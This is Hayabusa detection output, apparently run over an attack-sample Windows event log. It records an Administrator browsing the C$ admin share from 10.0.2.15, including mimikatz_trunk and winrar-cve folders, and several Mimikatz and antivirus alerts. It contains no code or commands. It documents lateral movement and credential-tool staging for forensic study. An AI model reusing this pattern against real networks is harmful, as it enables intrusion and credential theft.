2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\db : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\memdumps : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\platforms : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\release\x64\plugins : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Desktop\winrar-cve : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Favorites\Links for United States : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Searches : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\IEUser\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.927 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\Win32 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\mimikatz_trunk\x64 : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,critical,Mimikatz Use,,rules/sigma/builtin/win_alert_mimikatz_keywords.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.937 +09:00,PC01.example.corp,5145,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.947 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Music\Sample Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.957 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Pictures\Sample Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Videos\Sample Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.967 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\Public\Recorded TV\Sample Media : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$ : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Desktop : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.977 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Documents : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Downloads : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Favorites : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Links : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Music : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Pictures : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.987 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Saved Games : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\server01$\Videos : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Desktop\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Documents\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Downloads\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Favorites\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Links\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Music\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.997 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\sshd_server\Pictures\desktop.ini : IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
